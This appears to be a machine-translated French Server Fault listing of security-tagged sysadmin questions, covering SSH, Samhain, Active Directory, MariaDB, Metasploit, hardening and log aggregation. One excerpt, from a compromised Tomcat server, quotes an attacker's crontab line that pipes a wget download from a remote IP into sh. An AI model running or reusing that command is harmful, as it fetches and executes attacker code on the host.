Administrateurs de serveur security

2

Comment configurer les méthodes d'authentification OpenSSH par utilisateur?

J'aimerais pouvoir avoir un ensemble d'utilisateurs s'authentifiant à l'aide de l'authentification par clé publique et d'autres utilisateurs pour utiliser l'authentification par mot de passe. Est-ce possible dans OpenSSH sous Linux? Si oui, comment dois-je procéder? Après avoir parcouru /etc/ssh/sshd_config, il semble que je suis limité à l'activation de l'authentification par …

9 linux security ssh

1

Samhain peut-il surveiller un fichier qui n'existe pas, mais qui pourrait l'être à l'avenir?

J'aimerais que Samhain surveille un fichier, par exemple /root/somefile,. Ce fichier n'existe pas actuellement, mais j'aimerais être informé s'il est créé à tout moment. J'ajoute ceci à samhainrc: [ReadOnly] file = /root/somefile Cela provoque Samhain à émettre ces entrées de journal: Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] interface=<lstat>, …

8 linux security intrusion-detection

1

Pointage d'utilisateurs ou d'unités d'organisation spécifiques vers des contrôleurs de domaine spécifiques pour l'authentification de connexion

J'ai environ 200 utilisateurs. 50 se trouvent en Asie, 50 en Europe méridionale et orientale et une centaine en Europe occidentale. Je voudrais pointer les 50 utilisateurs qui sont en Asie vers notre DC en Asie, et actuellement, il semble qu'ils s'authentifient auprès de nos serveurs européens, ce qui provoque …

8 windows windows-server-2008 active-directory security

3

Attaque par script shell sur le serveur Apache, via un cron d'origine inconnue

Lors de l'exécution d'une guerre de projet sur le serveur Apache tomcat, j'ai constaté que le serveur était compromis. Tout en exécutant la guerre sur un inconnu cronfonctionne comme ceci [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * …

8 linux shell security tomcat

1

Solution simple pour recevoir une notification lorsque certains événements apparaissent dans les journaux Windows [fermé]

Fermé. Cette question est hors sujet . Il n'accepte pas actuellement de réponses. Voulez-vous améliorer cette question? Mettez à jour la question afin qu'elle soit sur le sujet de la défaillance du serveur. Fermé il y a 3 ans . Quel est le moyen le plus simple d'obtenir une notification …

8 security windows-event-log

2

Le mot de passe administrateur de MariaDb ne semble pas fonctionner

Je viens d'installer MariaDbsur un nouveau gnome Ubuntu et j'ai ensuite exécuté mysql_secure_installation où j'ai défini un mot de passe administrateur décent, supprimé l'utilisateur anonyme, etc. Ensuite, j'ai réalisé un comportement étrange concernant le mot de passe administrateur: Si j'essaie de me connecter à partir de mon compte utilisateur normal …

8 security mariadb authorization

2

Metasploit: le cache de base de données du module n'est pas encore construit, en utilisant une recherche lente

Un nouveau métasploit sur Kalilinux 2016 (dernière écurie) systemctl start postgresql OK Sur msfconsole msf > db_status [*] postgresql connected to msf Quand je lance la recherche msf > search samba [!] Module database cache not built yet, using slow search Donc je reconstruis le cache ... msf > db_rebuild_cache …

8 linux security

2

Pourquoi devriez-vous désactiver la connexion réseau pour les comptes locaux?

Cette question fait référence au fil Twitter de @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Après avoir lu le fil, je ne comprends toujours pas pourquoi vous souhaitez désactiver la connexion réseau pour les comptes locaux. Voici donc ce que je pense, corrigez-moi s'il vous plaît: Disons que j'ai un AD configuré avec un …

8 windows active-directory security group-policy windows-server-2012-r2

2

Comment configurer un agrégateur de journaux pour authentifier les données?

Contexte : l'agrégation de journaux à distance est considérée comme un moyen d'améliorer la sécurité. En règle générale, cela réduit le risque qu'un attaquant qui compromet un système puisse modifier ou supprimer des journaux afin de contrecarrer l'analyse judiciaire. J'ai recherché des options de sécurité dans les outils de journalisation …

8 security logging rsyslog logstash syslog-ng

1

Est-ce une mauvaise idée d'arrêter l'exécution de services inutiles

J'ai un serveur dédié debian. J'essaye de le sécuriser et une façon que je pensais être bonne est de fermer les services dont je n'ai pas besoin, comme FTP par exemple. Je propose d'exécuter quelque chose comme ça sur le déploiement: service ntp stop update-rc.d -f ntp remove service vsftpd …

8 linux security debian

3

Tarification des paires de clés et des groupes de sécurité sur AWS?

Mon compte AWS gratuit a expiré. J'ai supprimé toutes les ressources S3 et EC2, mais je me demande si je peux quitter le Key Pairset Security Groupssans avoir à les payer. (Les ressources de mon compte ressemblent maintenant à ceci: Ressources ) La documentation d'Amazon ne semble pas mentionner ce …

8 security amazon-ec2 amazon-web-services amazon-s3 resources

3

Dois-je acheter un deuxième certificat générique pour un sous-domaine?

Nous avons déjà un certificat générique pour *.mycompany.com. Notre réseau a des hôtes qui ne sont accessibles qu'en interne. Ils appartiennent tous au internal.mycompany.comsous - domaine. Il y a un serveur privé avec le nom d'hôte server.internal.mycompany.comsur lequel j'ai déployé notre certificat générique. Lorsque je visite le serveur Web, j'obtiens …

8 security ssl-certificate subdomain domain

1

Shell restreint pour la gestion des fichiers et des référentiels git

Pensez à une société d'hébergement Web qui souhaite permettre aux utilisateurs de gérer les fichiers et les référentiels git via ssh. Ceci comprend: copie sécurisée (scp) créer, copier, déplacer / renommer et supprimer des fichiers exécuter un sous-ensemble étroit de commandes pour le contrôle des sources et l'édition de texte …

8 linux security

2

/ dev / shm & / proc durcissement

J'ai vu la mention de sécuriser / dev / shm et / proc et je me demandais comment vous faites cela et en quoi cela consiste-t-il? Je suppose que cela implique une modification de /etc/sysctl.conf d'une certaine sorte. Comme ceux-ci? kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux security kernel

2

Gérer une attaque de commande non valide SMTP

L'un de nos serveurs de messagerie semi-occupés (sendmail) a eu beaucoup de connexions entrantes au cours des derniers jours à partir d'hôtes qui émettent des commandes inutiles. Au cours des deux derniers jours: connexions smtp entrantes avec des commandes invalides de 39 000 adresses IP uniques les adresses IP proviennent …

8 linux security smtp sendmail

Questions marquées «security»